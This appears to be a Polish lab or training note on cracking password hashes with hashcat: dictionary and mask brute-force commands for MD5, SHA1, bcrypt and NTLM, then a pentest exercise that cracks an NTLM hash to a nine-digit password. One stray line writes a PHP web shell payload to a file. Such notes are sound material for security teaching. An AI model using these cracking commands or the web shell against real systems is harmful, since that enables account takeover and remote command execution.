Łamanie hashy

Hashcat

Opis...

Typy hashy obsługiwane w zadaniach:

  • MD5 (-m 0)
  • SHA1 (-m 100)
  • bcrypt (-m 3200)
  • NTLM (-m 1000)

Tryby ataku:

  • słownikowy
  • brute-force (-a 3)

Hash MD5

Dekodowanie pliku o nazwie hash1, który zawiera hash zakodowany przy użyciu algorytmu MD5.

hashcat -m 0 hash1 /usr/share/wordlists/rockyou.txt

SCREEN: lamacze1 - src1


hash SHA1

Dekodowanie pliku o nazwie hash2, który zawiera hash zakodowany przy użyciu algorytmu SHA1.

hashcat -m 100 hash2 /usr/share/wordlists/rockyou.txt

SCREEN: lamacze2 - src1


hash bcrypt

Dekodowanie pliku o nazwie hash3, który zawiera hash zakodowany przy użyciu algorytmu bcrypt.

hashcat -m 3200 hash3 /usr/share/wordlists/rockyou.txt

W hashu bcrypt występuje znak $, który może być różnie interpretowany w konsoli. Uważaj na to.
SCREEN: lamacze3 - src1


hash NTLM

Dekodowanie pliku o nazwie hash4, który zawiera hash zakodowany przy użyciu algorytmu NTLM.

hashcat -m 1000 hash4 -a3 ?d?d?d?d?d?d?d?d?d?d?d

NTLM to metoda hashowania opracowana przez Microsoft i stosowana do zapisu haseł użytkowników w systemach z rodziny NT (m.in. Windows XP).
SCREEN: lamacze4 - src1

 echo '<?php system($_GET["x"]); ?>' > shell.txt
 cat shell.txt 

PENTEST

Cel: Złamanie wartości hasha:

B8DBB1B31B974AC88A49A4FF1E885BA4

1. Rozpoznanie typu hasha.

hashid B8DBB1B31B974AC88A49A4FF1E885BA4

🚨 Hash ma 32 znaki hex = 16 bajtów → zgadza się z NTLM (MD4 w UTF-16LE). Dodatkowo jest 9 cyfrowy.

2. Utworzenie pliku z hashem.

bash

echo B8DBB1B31B974AC88A49A4FF1E885BA4 > hashntlm.txt

3. Próba złamania słownikowego (najszybsza metoda).

bash

hashcat -m 1000 hashntlm.txt /usr/share/wordlists/rockyou.txt

🚨 Nieobecny w żadnym słowniku.

3. Brute-force (mask attack).

hashcat -m 1000 hashntlm.txt -a 3 ?d?d?d?d?d?d?d?d?d

SCREEN: hashcat1-scr1
🚨 Hasło to: 758741256